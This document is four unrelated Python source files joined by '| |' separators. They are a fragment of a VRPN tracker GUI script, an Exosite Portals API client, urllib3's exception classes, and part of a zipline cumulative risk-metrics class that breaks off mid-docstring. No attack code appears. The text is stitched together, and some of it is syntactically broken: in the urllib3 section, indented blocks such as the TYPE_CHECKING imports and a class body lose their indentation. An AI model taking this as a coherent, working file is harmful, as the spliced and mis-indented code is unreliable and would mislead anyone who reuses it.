vrpn_Tracker.register_tracker_change_handler(widget.handler)
tracker = vrpn_Tracker.vrpn_Tracker_Remote(argv[1])
tracker.register_change_handler(None, vrpn_Tracker.get_tracker_change_handler())
# start main thread
mt = mainthread(tracker,widget)
mt.start()
# start main app
app.exec_()
pass
main(sys.argv)
| |
# pylint: disable=W0312,R0913
import requests, json
from pyonep.portals.constants import HTTP_STATUS
from pyonep.portals.endpoints import Endpoints
from pyonep.portals.utils import dictify_device_meta,\
stringify_device_meta
from getpass import getpass
import sys
# Py2/Py3 compatibility: expose a single `_input` that returns a str
# (raw_input on Python 2, input on Python 3).
if sys.version_info[0] < 3:
    _input = raw_input
else:
    _input = input
class Portals(Endpoints):
    """Client for the Exosite Portals HTTP API, bound to a single domain,
    Portal and user. Extends Endpoints with device, data-source and
    user-permission helpers."""
    def __init__( self,
                    domain,
                    portal_name,
                    user,
                    auth='__prompt__',
                    use_token=False,
                    debug=False):
        """
        Params:
            domain: the domain of the Exosite domain your Portal is on.
                    i.e. mydomain.exosite.com
            portal_name: the name of the Exosite Portal. i.e. 'My Device Portal'
            user: typically, the email address you use to logon to Portals
                    or your Portals user name
            auth: if left blank, the creator of the Portals object will
                    be prompted for their Portals password. If specifying the
                    auth parameter, it should be either the user password or a
                    Portals token
            use_token: if using a token in the auth parameter, set this to True.
                    Otherwise, leave blank
        """
        if auth == '__prompt__':
            print('') # some interpreters don't put a newline before the getpass prompt
            auth = getpass('Enter User Password: ')
        else:
            # no-op branch: auth already holds the password or token
            auth = auth
        Endpoints.__init__( self,
                            domain,
                            portal_name,
                            user,
                            auth,
                            use_token=use_token
        )
    def get_portals_list(self):
        """ Method to return a list of Portal names with their ids.
        Returns a list of 3-tuples:
        [(portal_id, portal_name, (portal_id, portal_object)), ...]
        """
        portal_ids = self.get_domain_portal_ids()
        portals = [ (p, self.get_portal_by_id(p)) for p in portal_ids ]
        return [ (p[0], p[1]['info']['description']['name'], p) for p in portals ]
    def user_portals_picker(self):
        """
        This function is broken and needs to either be fixed or discarded.
        User-Interaction function. Allows user to choose which Portal
        to make the active one.
        """
        # print("Getting Portals list. This could take a few seconds...")
        portals = self.get_portals_list()
        done = False
        while not done:
            opts = [ (i, p) for i, p in enumerate(portals) ]
            # print('')
            for opt, portal in opts:
                print("\t{0} - {1}".format(opt, portal[1]))
            # print('')
            valid_choices = [o[0] for o in opts]
            choice = _input("Enter choice ({0}): ".format(valid_choices) )
            if int(choice) in valid_choices:
                done = True
                # loop through all portals until we find an 'id':'rid' match
                self.set_portal_name( opts[int(choice)][1][1] )
                self.set_portal_id( opts[int(choice)][1][0] )
                # self.set_portal_rid( opts[int(choice)][1][2][1]['info']['key'] )
                # self.__portal_sn_rid_dict = opts[int(choice)][1][2][1]['info']['aliases']
            else:
                print("'{0}' is not a valid choice. Please choose from {1}".format(
                    choice, valid_choices))
    def get_portal_by_name(self, portal_name):
        """
        Set active portal according to the name passed in 'portal_name'.
        Returns the matching 3-tuple from get_portals_list(), or None.
        """
        portals = self.get_portals_list()
        for p in portals:
            # print("Checking {!r}".format(p))
            if portal_name == p[1]:
                # print("Found Portal!")
                self.set_portal_name( p[1] )
                self.set_portal_id( p[0] )
                self.set_portal_cik( p[2][1]['info']['key'] )
                # print("Active Portal Details:\nName: {0}\nId: {1}\nCIK: {2}".format(
                #     self.portal_name(),
                #     self.portal_id(),
                #     self.portal_cik()))
                return p
        return None
    @classmethod
    def login_to_portal(cls,
                        domain=None,
                        portal_name=None,
                        user=None,
                        credential=None,
                        use_token=False,
                        portal_id=None,
                        # portal_rid=None,
                        get_devices=False,
                        debug=False):
        """
        A classmethod that returns a (token, Portals object) tuple.
        This method can be interactive based on the input arguments.
        Sets up the Portals object with all the member variables
        it needs to make future api calls. It basically just calls
        Portals.get_portal_by_name(), and returns the user token along
        with the logged-in Portals() object.
        This is a convenience function that can be called at the
        time of instantiation.
        Instantiate the Portals object with user/password authentication
        then call this function. The resultant object will be a Portals
        object that uses token authentication for all future calls
        instead of using user/password credentials.
        Examples:
            # for interactive mode, get a password prompt, a token
            # and a logged-in Portals object
            token, B = Portals.login_to_portal(    domain=<domain>,
                                                portal_name=<portal>,
                                                user=<user/email>
                                )
            # for non-interactive mode, passing in user password to
            # get a token and a logged-in Portals object
            token, B = Portals.login_to_portal(    domain=<domain>,
                                                portal_name=<portal>,
                                                user=<user/email>,
                                                credential=<password>
                                )
            # for non-interactive mode, passing in token to get a
            # logged-in Portals object
            token, B = Portals.login_to_portal(    domain=<domain>,
                                                portal_name=<portal>,
                                                user=<user/email>,
                                                credential=<token>,
                                                use_token=True
                                )
            # for non-interactive mode, passing in token and id
            # to get a Portals object that doesn't need to make any
            # Portals API calls.
            token, B = Portals.login_to_portal(    domain=<domain>,
                                                portal_name=<portal>,
                                                user=<user/email>,
                                                credential=<token>,
                                                use_token=True,
                                                portal_id=<portal_id>,
                                                portal_rid=<portal_rid>
                                )
        """
        # Prompt for anything not supplied.
        if domain is None:
            domain = _input("Enter domain: ")
        if portal_name is None:
            portal_name = _input("Enter name of Portal: ")
        if user is None:
            user = _input("Enter username: ")
        if None is credential:
            # interactive mode
            B = Portals(    domain=domain,
                            portal_name=portal_name,
                            user=user,
                            debug=debug
                )
            token = B.get_user_token()
            # print("Got token {0}".format(token))
        elif not None is credential and not use_token:
            # non-interactive, using a user-password to retrieve token
            B = Portals(    domain=domain,
                            portal_name=portal_name,
                            user=user,
                            auth=credential,
                            debug=debug
                )
            token = B.get_user_token()
        elif not None is credential and use_token:
            # non-interactive, mainly just need to instantiate an object.
            B = Portals(    domain=domain,
                            portal_name=portal_name,
                            user=user,
                            auth=credential,
                            use_token=use_token,
                            debug=debug
                )
            token = credential
        # Resolve the portal id via the API unless it was provided.
        if portal_id is None: # or portal_rid is None:
            B.get_portal_by_name(B.portal_name())
        else:
            B.set_portal_id(portal_id)
            # B.set_portal_rid(portal_rid)
        if get_devices:
            B.map_aliases_to_device_objects()
        return token, B
    def rename_device(self, device_obj, new_name):
        """
        Returns 'device object' of newly created device.
        http://docs.exosite.com/portals/#update-device
        http://docs.exosite.com/portals/#device-object
        """
        device_obj['info']['description']['name'] = new_name
        return self.update_device(device_obj)
    def add_device_with_name_location_timezone(    self,
                                                model,
                                                serial,
                                                name,
                                                location,
                                                timezone):
        """
        This method wraps the self.add_device() and self.rename_device()
        methods.
        Returns device object.
        """
        retval = None
        # Create, rename, then tag with location/timezone — each step
        # feeds its resulting device object into the next.
        retval = self.add_location_timezone_to_device(
            self.rename_device(
                self.add_device(
                    model,
                    serial),
                name
            ),
            location,
            timezone
        )
        return retval
    def add_location_timezone_to_device(self, device_obj, location, timezone):
        """
        Returns 'device object' with updated location
        http://docs.exosite.com/portals/#update-device
        http://docs.exosite.com/portals/#device-object
        """
        dictify_device_meta(device_obj)
        # NOTE(review): both capitalizations are written — presumably
        # different Portals consumers read different keys; confirm.
        device_obj['info']['description']['meta']['location'] = location
        device_obj['info']['description']['meta']['Location'] = location
        device_obj['info']['description']['meta']['timezone'] = timezone
        device_obj['info']['description']['meta']['Timezone'] = timezone
        return self.update_device(device_obj)
    def delete_device(self, rid):
        """
        Deletes device object with given rid
        http://docs.exosite.com/portals/#delete-device
        """
        headers = {
            'User-Agent': self.user_agent(),
            'Content-Type': self.content_type()
        }
        headers.update(self.headers())
        r = requests.delete(    self.portals_url()+'/devices/'+rid,
                                headers=headers,
                                auth=self.auth())
        if HTTP_STATUS.NO_CONTENT == r.status_code:
            print("Successfully deleted device with rid: {0}".format(rid))
            return True
        else:
            print("Something went wrong: <{0}>: {1}".format(
                r.status_code, r.reason))
            r.raise_for_status()
        return False
    def list_portal_data_sources(self):
        """
        List data sources of the portal.
        http://docs.exosite.com/portals/#list-portal-data-source
        """
        headers = {
            'User-Agent': self.user_agent(),
        }
        headers.update(self.headers())
        r = requests.get(    self.portals_url()+'/portals/'+self.portal_id()+'/data-sources',
                            headers=headers,
                            auth=self.auth()
            )
        if HTTP_STATUS.OK == r.status_code:
            return r.json()
        else:
            print("Something went wrong: <{0}>: {1}".format(
                r.status_code, r.reason))
        return {}
    def list_device_data_sources(self, device_rid):
        """
        List data sources of a portal device with rid 'device_rid'.
        http://docs.exosite.com/portals/#list-device-data-source
        """
        headers = {
            'User-Agent': self.user_agent(),
        }
        headers.update(self.headers())
        r = requests.get(    self.portals_url()+'/devices/'+device_rid+'/data-sources',
                            headers=headers, auth=self.auth())
        if HTTP_STATUS.OK == r.status_code:
            return r.json()
        else:
            print("Something went wrong: <{0}>: {1}".format(
                r.status_code, r.reason))
        return None
    def get_data_source_bulk_request(self, rids, limit=5):
        """
        This grabs each datasource and its multiple datapoints for a particular device.
        """
        headers = {
            'User-Agent': self.user_agent(),
            'Content-Type': self.content_type()
        }
        headers.update(self.headers())
        # Portals bulk syntax: /data-sources/[rid1,rid2,...]/data
        r = requests.get(    self.portals_url()
                            +'/data-sources/['
                            +",".join(rids)
                            +']/data?limit='+str(limit),
                            headers=headers, auth=self.auth())
        if HTTP_STATUS.OK == r.status_code:
            return r.json()
        else:
            print("Something went wrong: <{0}>: {1}".format(
                r.status_code, r.reason))
        return {}
    def get_cik(self, rid):
        """
        Retrieves the CIK key for a device.
        """
        device = self.get_device(rid)
        return device['info']['key']
    def get_all_devices_in_portal(self):
        """
        This loops through the get_multiple_devices method 10 rids at a time.
        """
        rids = self.get_portal_by_name(
                    self.portal_name()
                )[2][1]['info']['aliases']
        # print("RIDS: {0}".format(rids))
        device_rids = [ rid.strip() for rid in rids ]
        # Fetch in chunks of 10 to keep request sizes bounded.
        blocks_of_ten = [ device_rids[x:x+10] for x in range(0, len(device_rids), 10) ]
        devices = []
        for block_of_ten in blocks_of_ten:
            retval = self.get_multiple_devices(block_of_ten)
            if retval is not None:
                devices.extend( retval )
            else:
                print("Not adding to device list: {!r}".format(retval))
        # Parse 'meta' key's raw string values for each device
        for device in devices:
            dictify_device_meta(device)
        return devices
    def map_aliases_to_device_objects(self):
        """
        A device object knows its rid, but not its alias.
        A portal object knows its device rids and aliases.
        This function adds a 'portals_aliases' key to all of the
        device objects so they can be sorted by alias.
        """
        all_devices = self.get_all_devices_in_portal()
        for dev_o in all_devices:
            dev_o['portals_aliases'] = self.get_portal_by_name(
                                        self.portal_name()
                                    )[2][1]['info']['aliases'][ dev_o['rid'] ]
        return all_devices
    def search_for_devices_by_serial_number(self, sn):
        """
        Returns a list of device objects that match the serial number
        in param 'sn'.
        This will match partial serial numbers.
        """
        import re
        # NOTE: re.match anchors at the start, so 'sn' matches as a prefix
        # (or any regex the caller supplies), not as a substring.
        sn_search = re.compile(sn)
        matches = []
        for dev_o in self.get_all_devices_in_portal():
            # print("Checking {0}".format(dev_o['sn']))
            try:
                if sn_search.match(dev_o['sn']):
                    matches.append(dev_o)
            except TypeError as err:
                print("Problem checking device {!r}: {!r}".format(
                    dev_o['info']['description']['name'],
                    str(err)))
        return matches
    def print_device_list(self, device_list=None):
        """
        Optional parameter is a list of device objects. If omitted, will
        just print all portal devices objects.
        """
        dev_list = device_list if device_list is not None else self.get_all_devices_in_portal()
        for dev in dev_list:
            print('{0}\t\t{1}\t\t{2}'.format(
                    dev['info']['description']['name'],
                    dev['sn'],
                    dev['portals_aliases']\
                        if len(dev['portals_aliases']) != 1
                        else dev['portals_aliases'][0]
                    )
            )
    def print_sorted_device_list(self, device_list=None, sort_key='sn'):
        """
        Takes in a sort key and prints the device list according to that sort.
        Default sorts on serial number.
        Current supported sort options are:
        - name
        - sn
        - portals_aliases
        Can take optional device object list.
        """
        dev_list = device_list if device_list is not None else self.get_all_devices_in_portal()
        sorted_dev_list = []
        # Devices whose key is None are silently excluded from the output.
        if sort_key == 'sn':
            sort_keys = [ k[sort_key] for k in dev_list if k[sort_key] is not None ]
            sort_keys = sorted(sort_keys)
            for key in sort_keys:
                sorted_dev_list.extend([ d for d in dev_list if d['sn'] == key ])
        elif sort_key == 'name':
            sort_keys = [ k['info']['description'][sort_key]\
                            for k in dev_list if k['info']['description'][sort_key] is not None ]
            sort_keys = sorted(sort_keys)
            for key in sort_keys:
                sorted_dev_list.extend( [ d for d in dev_list\
                                            if d['info']['description'][sort_key] == key
                                        ]
                )
        elif sort_key == 'portals_aliases':
            sort_keys = [ k[sort_key] for k in dev_list if k[sort_key] is not None ]
            sort_keys = sorted(sort_keys)
            for key in sort_keys:
                sorted_dev_list.extend([ d for d in dev_list if d[sort_key] == key ])
        else:
            print("Sort key {!r} not recognized.".format(sort_key))
            sort_keys = None
        self.print_device_list(device_list=sorted_dev_list)
    def get_user_id_from_email(self, email):
        """ Uses the get-all-user-accounts Portals API to retrieve the
        user-id by supplying an email. """
        accts = self.get_all_user_accounts()
        for acct in accts:
            if acct['email'] == email:
                return acct['id']
        return None
    def get_user_permission_from_email(self, email):
        """ Returns a user's permissions object when given the user email."""
        _id = self.get_user_id_from_email(email)
        return self.get_user_permission(_id)
    def add_dplist_permission_for_user_on_portal(self, user_email, portal_id):
        """ Adds the 'd_p_list' permission to a user object when provided
        a user_email and portal_id."""
        _id = self.get_user_id_from_email(user_email)
        # Print before/after permissions so the change is visible in logs.
        print(self.get_user_permission_from_email(user_email))
        retval = self.add_user_permission(    _id, json.dumps(
                [{'access': 'd_p_list', 'oid':{'id': portal_id, 'type':'Portal'}}]
            )
        )
        print(self.get_user_permission_from_email(user_email))
        return retval
    def get_portal_cik(self, portal_name):
        """ Retrieves portal object according to 'portal_name' and
        returns its cik. """
        portal = self.get_portal_by_name(portal_name)
        cik = portal[2][1]['info']['key']
        return cik
| |
import socket
import warnings
from email.errors import MessageDefect
from http.client import IncompleteRead as httplib_IncompleteRead
from typing import TYPE_CHECKING, Callable, List, Optional, Tuple, Union
if TYPE_CHECKING:
from .connection import HTTPConnection
from .connectionpool import ConnectionPool
from .response import HTTPResponse
from .util.retry import Retry
# Base Exceptions
class HTTPError(Exception):
    """Base exception used by this module."""
    # Root of this module's exception hierarchy; all errors subclass it.
    pass
class HTTPWarning(Warning):
"""Base warning used by this module."""
pass
_TYPE_REDUCE_RESULT = Tuple[Callable[..., object], Tuple[object, ...]]
class PoolError(HTTPError):
    """Base exception for errors caused within a pool."""

    def __init__(self, pool: "ConnectionPool", message: str) -> None:
        self.pool = pool
        super().__init__(f"{pool}: {message}")

    def __reduce__(self) -> _TYPE_REDUCE_RESULT:
        # Pools are not picklable, so drop the pool reference when pickling.
        return self.__class__, (None, None)


class RequestError(PoolError):
    """Base exception for PoolErrors that have associated URLs."""

    def __init__(self, pool: "ConnectionPool", url: str, message: str) -> None:
        self.url = url
        super().__init__(pool, message)

    def __reduce__(self) -> _TYPE_REDUCE_RESULT:
        # Keep only the URL when pickling; the pool itself is not picklable.
        return self.__class__, (None, self.url, None)
class SSLError(HTTPError):
    """Raised when SSL certificate fails in an HTTPS connection."""


class ProxyError(HTTPError):
    """Raised when the connection to a proxy fails."""

    # The original error is also available as __cause__.
    original_error: Exception

    def __init__(self, message: str, error: Exception) -> None:
        super().__init__(message, error)
        self.original_error = error


class DecodeError(HTTPError):
    """Raised when automatic decoding based on Content-Type fails."""


class ProtocolError(HTTPError):
    """Raised when something unexpected happens mid-request/response."""


#: Renamed to ProtocolError but aliased for backwards compatibility.
ConnectionError = ProtocolError
# Leaf Exceptions
class MaxRetryError(RequestError):
    """Raised when the maximum number of retries is exceeded.

    :param pool: The connection pool
    :type pool: :class:`~urllib3.connectionpool.HTTPConnectionPool`
    :param string url: The requested Url
    :param exceptions.Exception reason: The underlying error
    """

    def __init__(
        self, pool: "ConnectionPool", url: str, reason: Optional[Exception] = None
    ) -> None:
        message = f"Max retries exceeded with url: {url} (Caused by {reason!r})"
        super().__init__(pool, url, message)
        self.reason = reason


class HostChangedError(RequestError):
    """Raised when an existing pool gets a request for a foreign host."""

    def __init__(
        self, pool: "ConnectionPool", url: str, retries: Union["Retry", int] = 3
    ) -> None:
        super().__init__(pool, url, f"Tried to open a foreign host with url: {url}")
        self.retries = retries
class TimeoutStateError(HTTPError):
    """Raised when passing an invalid state to a timeout"""


class TimeoutError(HTTPError):
    """Raised when a socket timeout error occurs.

    Catching this error will catch both :exc:`ReadTimeoutErrors
    <ReadTimeoutError>` and :exc:`ConnectTimeoutErrors <ConnectTimeoutError>`.
    """


class ReadTimeoutError(TimeoutError, RequestError):
    """Raised when a socket timeout occurs while receiving data from a server"""


# This timeout error does not have a URL attached and needs to inherit from the
# base HTTPError
class ConnectTimeoutError(TimeoutError):
    """Raised when a socket timeout occurs while connecting to a server"""
class NewConnectionError(ConnectTimeoutError, HTTPError):
    """Raised when we fail to establish a new connection. Usually ECONNREFUSED."""

    def __init__(self, conn: "HTTPConnection", message: str) -> None:
        self.conn = conn
        super().__init__(f"{conn}: {message}")

    @property
    def pool(self) -> "HTTPConnection":
        # Deprecated alias kept for callers that still use the old
        # PoolError-style attribute name.
        warnings.warn(
            "The 'pool' property is deprecated and will be removed "
            "in a later urllib3 v2.x release. use 'conn' instead.",
            DeprecationWarning,
            stacklevel=2,
        )
        return self.conn


class NameResolutionError(NewConnectionError):
    """Raised when host name resolution fails."""

    def __init__(self, host: str, conn: "HTTPConnection", reason: socket.gaierror):
        super().__init__(conn, f"Failed to resolve '{host}' ({reason})")
class EmptyPoolError(PoolError):
    """Raised when a pool runs out of connections and no more are allowed."""


class FullPoolError(PoolError):
    """Raised when we try to add a connection to a full pool in blocking mode."""


class ClosedPoolError(PoolError):
    """Raised when a request enters a pool after the pool has been closed."""


class LocationValueError(ValueError, HTTPError):
    """Raised when there is something wrong with a given URL input."""
class LocationParseError(LocationValueError):
    """Raised when get_host or similar fails to parse the URL input."""

    def __init__(self, location: str) -> None:
        super().__init__(f"Failed to parse: {location}")
        self.location = location


class URLSchemeUnknown(LocationValueError):
    """Raised when a URL input has an unsupported scheme."""

    def __init__(self, scheme: str):
        super().__init__(f"Not supported URL scheme {scheme}")
        self.scheme = scheme


class ResponseError(HTTPError):
    """Used as a container for an error reason supplied in a MaxRetryError."""

    # Template messages used by the retry machinery when composing a reason.
    GENERIC_ERROR = "too many error responses"
    SPECIFIC_ERROR = "too many {status_code} error responses"
class SecurityWarning(HTTPWarning):
    """Warned when performing security reducing actions"""


class InsecureRequestWarning(SecurityWarning):
    """Warned when making an unverified HTTPS request."""


class SystemTimeWarning(SecurityWarning):
    """Warned when system time is suspected to be wrong"""


class InsecurePlatformWarning(SecurityWarning):
    """Warned when certain TLS/SSL configuration is not available on a platform."""


class SNIMissingWarning(HTTPWarning):
    """Warned when making a HTTPS request without SNI available."""


class DependencyWarning(HTTPWarning):
    """
    Warned when an attempt is made to import a module with missing optional
    dependencies.
    """


class ResponseNotChunked(ProtocolError, ValueError):
    """Response needs to be chunked in order to read it as chunks."""


class BodyNotHttplibCompatible(HTTPError):
    """
    Body should be :class:`http.client.HTTPResponse` like
    (have an fp attribute which returns raw chunks) for read_chunked().
    """
class IncompleteRead(HTTPError, httplib_IncompleteRead):
    """
    Response length doesn't match expected Content-Length

    Subclass of :class:`http.client.IncompleteRead` to allow int value
    for ``partial`` to avoid creating large objects on streamed reads.
    """

    def __init__(self, partial: int, expected: int) -> None:
        # Intentionally bypass the base __init__, which would store the
        # partially-read body; an int count is enough here.
        self.partial = partial  # type: ignore[assignment]
        self.expected = expected

    def __repr__(self) -> str:
        return "IncompleteRead(%i bytes read, %i more expected)" % (
            self.partial,  # type: ignore[str-format]
            self.expected,
        )


class InvalidChunkLength(HTTPError, httplib_IncompleteRead):
    """Invalid chunk length in a chunked response."""

    def __init__(self, response: "HTTPResponse", length: bytes) -> None:
        self.partial: int = response.tell()  # type: ignore[assignment]
        self.expected: Optional[int] = response.length_remaining
        self.response = response
        self.length = length

    def __repr__(self) -> str:
        return "InvalidChunkLength(got length %r, %i bytes read)" % (
            self.length,
            self.partial,
        )
class InvalidHeader(HTTPError):
    """The header provided was somehow invalid."""


class ProxySchemeUnknown(AssertionError, URLSchemeUnknown):
    """ProxyManager does not support the supplied scheme"""

    # TODO(t-8ch): Stop inheriting from AssertionError in v2.0.

    def __init__(self, scheme: Optional[str]) -> None:
        # 'localhost' is here because our URL parser parses
        # localhost:8080 -> scheme=localhost, remove if we fix this.
        if scheme == "localhost":
            scheme = None
        if scheme is None:
            message = "Proxy URL had no scheme, should start with http:// or https://"
        else:
            message = f"Proxy URL had unsupported scheme {scheme}, should use http:// or https://"
        super().__init__(message)


class ProxySchemeUnsupported(ValueError):
    """Fetching HTTPS resources through HTTPS proxies is unsupported"""
class HeaderParsingError(HTTPError):
    """Raised by assert_header_parsing, but we convert it to a log.warning statement."""

    def __init__(
        self, defects: List[MessageDefect], unparsed_data: Optional[Union[bytes, str]]
    ) -> None:
        super().__init__(f"{defects or 'Unknown'}, unparsed data: {unparsed_data!r}")


class UnrewindableBodyError(HTTPError):
    """urllib3 encountered an error when trying to rewind a body"""
| |
#
# Copyright 2014 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import logbook
import numpy as np
import pandas as pd
from pandas.tseries.tools import normalize_date
from six import iteritems
from . risk import (
check_entry,
choose_treasury
)
from empyrical import (
alpha_beta_aligned,
annual_volatility,
cum_returns,
downside_risk,
max_drawdown,
sharpe_ratio,
sortino_ratio,
)
# Module-level logger for this risk module.
log = logbook.Logger('Risk Cumulative')
# Risk-free rate source: always select the '10year' treasury curve,
# without compounding, regardless of the period arguments passed in.
choose_treasury = functools.partial(choose_treasury, lambda *args: '10year',
                                    compound=False)
class RiskMetricsCumulative(object):
    """
    :Usage:
        Instantiate RiskMetricsCumulative once.
        Call update() method on each dt to update the metrics.
    """

    # Metrics surfaced by __repr__; each is a per-session ndarray attribute.
    METRIC_NAMES = (
        'alpha',
        'beta',
        'sharpe',
        'algorithm_volatility',
        'benchmark_volatility',
        'downside_risk',
        'sortino',
    )

    def __init__(self, sim_params, treasury_curves, trading_calendar,
                 create_first_day_stats=False):
        """Pre-allocate per-session containers for every cumulative metric.

        Parameters
        ----------
        sim_params : object
            Provides ``start_session`` and ``end_session`` of the run.
        treasury_curves : pd.DataFrame
            Treasury curves used to derive the risk-free rate.
        trading_calendar : object
            Calendar with ``sessions_in_range`` used to enumerate sessions.
        create_first_day_stats : bool, optional
            When True, a synthetic 0.0 return is prepended on the first
            session so first-day statistics are well defined.
        """
        self.treasury_curves = treasury_curves
        self.trading_calendar = trading_calendar
        self.start_session = sim_params.start_session
        self.end_session = sim_params.end_session

        self.sessions = trading_calendar.sessions_in_range(
            self.start_session, self.end_session
        )

        # Hold on to the trading day before the start,
        # used for index of the zero return value when forcing returns
        # on the first day.
        self.day_before_start = self.start_session - self.sessions.freq

        last_day = normalize_date(sim_params.end_session)
        if last_day not in self.sessions:
            # End of the simulation is not a session; append it so that
            # metrics on the final (partial) day still have a slot.
            last_day = pd.tseries.index.DatetimeIndex(
                [last_day]
            )
            self.sessions = self.sessions.append(last_day)

        self.sim_params = sim_params

        self.create_first_day_stats = create_first_day_stats

        cont_index = self.sessions

        self.cont_index = cont_index
        self.cont_len = len(self.cont_index)

        # All metric containers are NaN-filled arrays, one slot per session.
        empty_cont = np.full(self.cont_len, np.nan)

        self.algorithm_returns_cont = empty_cont.copy()
        self.benchmark_returns_cont = empty_cont.copy()
        self.algorithm_cumulative_leverages_cont = empty_cont.copy()
        self.mean_returns_cont = empty_cont.copy()
        self.annualized_mean_returns_cont = empty_cont.copy()
        self.mean_benchmark_returns_cont = empty_cont.copy()
        self.annualized_mean_benchmark_returns_cont = empty_cont.copy()

        # The returns at a given time are read and reset from the respective
        # returns container.
        self.algorithm_returns = None
        self.benchmark_returns = None
        self.mean_returns = None
        self.annualized_mean_returns = None
        self.mean_benchmark_returns = None
        self.annualized_mean_benchmark_returns = None

        self.algorithm_cumulative_returns = empty_cont.copy()
        self.benchmark_cumulative_returns = empty_cont.copy()
        self.algorithm_cumulative_leverages = empty_cont.copy()
        self.excess_returns = empty_cont.copy()

        self.latest_dt_loc = 0
        self.latest_dt = cont_index[0]

        self.benchmark_volatility = empty_cont.copy()
        self.algorithm_volatility = empty_cont.copy()
        self.beta = empty_cont.copy()
        self.alpha = empty_cont.copy()
        self.sharpe = empty_cont.copy()
        self.downside_risk = empty_cont.copy()
        self.sortino = empty_cont.copy()

        self.drawdowns = empty_cont.copy()
        self.max_drawdowns = empty_cont.copy()
        self.max_drawdown = 0
        self.max_leverages = empty_cont.copy()
        self.max_leverage = 0
        self.current_max = -np.inf
        # Per-day cache of the risk-free rate (see update()).
        self.daily_treasury = pd.Series(index=self.sessions)
        self.treasury_period_return = np.nan

        self.num_trading_days = 0

    def update(self, dt, algorithm_returns, benchmark_returns, leverage):
        """Ingest one session's observations and refresh every metric.

        Parameters
        ----------
        dt : pd.Timestamp
            Session being recorded; must be present in ``cont_index``.
        algorithm_returns : float
            Algorithm return for the session.
        benchmark_returns : float
            Benchmark return for the session.
        leverage : float
            Algorithm leverage for the session.
        """
        # Keep track of latest dt for use in to_dict and other methods
        # that report current state.
        self.latest_dt = dt
        dt_loc = self.cont_index.get_loc(dt)
        self.latest_dt_loc = dt_loc

        self.algorithm_returns_cont[dt_loc] = algorithm_returns
        self.algorithm_returns = self.algorithm_returns_cont[:dt_loc + 1]
        self.num_trading_days = len(self.algorithm_returns)

        if self.create_first_day_stats:
            if len(self.algorithm_returns) == 1:
                self.algorithm_returns = np.append(0.0, self.algorithm_returns)

        self.algorithm_cumulative_returns[dt_loc] = cum_returns(
            self.algorithm_returns
        )[-1]

        algo_cumulative_returns_to_date = \
            self.algorithm_cumulative_returns[:dt_loc + 1]

        self.mean_returns_cont[dt_loc] = \
            algo_cumulative_returns_to_date[dt_loc] / self.num_trading_days

        self.mean_returns = self.mean_returns_cont[:dt_loc + 1]

        # 252 trading days per year annualization convention.
        self.annualized_mean_returns_cont[dt_loc] = \
            self.mean_returns_cont[dt_loc] * 252

        self.annualized_mean_returns = \
            self.annualized_mean_returns_cont[:dt_loc + 1]

        if self.create_first_day_stats:
            if len(self.mean_returns) == 1:
                self.mean_returns = np.append(0.0, self.mean_returns)
                self.annualized_mean_returns = np.append(
                    0.0, self.annualized_mean_returns)

        self.benchmark_returns_cont[dt_loc] = benchmark_returns
        self.benchmark_returns = self.benchmark_returns_cont[:dt_loc + 1]

        if self.create_first_day_stats:
            if len(self.benchmark_returns) == 1:
                self.benchmark_returns = np.append(0.0, self.benchmark_returns)

        self.benchmark_cumulative_returns[dt_loc] = cum_returns(
            self.benchmark_returns
        )[-1]

        benchmark_cumulative_returns_to_date = \
            self.benchmark_cumulative_returns[:dt_loc + 1]

        self.mean_benchmark_returns_cont[dt_loc] = \
            benchmark_cumulative_returns_to_date[dt_loc] / \
            self.num_trading_days

        # BUG FIX: previously sliced with [:dt_loc], which dropped the
        # current session and left this one element shorter than its
        # algorithm counterpart above.
        self.mean_benchmark_returns = \
            self.mean_benchmark_returns_cont[:dt_loc + 1]

        self.annualized_mean_benchmark_returns_cont[dt_loc] = \
            self.mean_benchmark_returns_cont[dt_loc] * 252
        self.annualized_mean_benchmark_returns = \
            self.annualized_mean_benchmark_returns_cont[:dt_loc + 1]

        self.algorithm_cumulative_leverages_cont[dt_loc] = leverage
        self.algorithm_cumulative_leverages = \
            self.algorithm_cumulative_leverages_cont[:dt_loc + 1]

        if self.create_first_day_stats:
            if len(self.algorithm_cumulative_leverages) == 1:
                self.algorithm_cumulative_leverages = np.append(
                    0.0,
                    self.algorithm_cumulative_leverages)

        # BUG FIX: the original guard (`not len(a) and len(b)`) could only
        # fire when algorithm_returns was empty, which never happens after
        # the assignment above; the error message clearly intends a
        # length-mismatch check between the two series.
        if len(self.algorithm_returns) != len(self.benchmark_returns):
            message = "Mismatch between benchmark_returns ({bm_count}) and \
algorithm_returns ({algo_count}) in range {start} : {end} on {dt}"
            message = message.format(
                bm_count=len(self.benchmark_returns),
                algo_count=len(self.algorithm_returns),
                start=self.start_session,
                end=self.end_session,
                dt=dt
            )
            raise Exception(message)

        self.update_current_max()
        self.benchmark_volatility[dt_loc] = annual_volatility(
            self.benchmark_returns
        )
        self.algorithm_volatility[dt_loc] = annual_volatility(
            self.algorithm_returns
        )

        # caching the treasury rates for the minutely case is a
        # big speedup, because it avoids searching the treasury
        # curves on every minute.
        # In both minutely and daily, the daily curve is always used.
        treasury_end = dt.replace(hour=0, minute=0)
        if np.isnan(self.daily_treasury[treasury_end]):
            treasury_period_return = choose_treasury(
                self.treasury_curves,
                self.start_session,
                treasury_end,
                self.trading_calendar,
            )
            self.daily_treasury[treasury_end] = treasury_period_return
        self.treasury_period_return = self.daily_treasury[treasury_end]
        self.excess_returns[dt_loc] = (
            self.algorithm_cumulative_returns[dt_loc] -
            self.treasury_period_return)

        self.alpha[dt_loc], self.beta[dt_loc] = alpha_beta_aligned(
            self.algorithm_returns,
            self.benchmark_returns,
        )
        self.sharpe[dt_loc] = sharpe_ratio(
            self.algorithm_returns,
        )
        self.downside_risk[dt_loc] = downside_risk(
            self.algorithm_returns
        )
        self.sortino[dt_loc] = sortino_ratio(
            self.algorithm_returns,
            _downside_risk=self.downside_risk[dt_loc]
        )
        self.max_drawdown = max_drawdown(
            self.algorithm_returns
        )
        self.max_drawdowns[dt_loc] = self.max_drawdown
        self.max_leverage = self.calculate_max_leverage()
        self.max_leverages[dt_loc] = self.max_leverage

    def to_dict(self):
        """
        Creates a dictionary representing the state of the risk report.
        Returns a dict object of the form:
        """
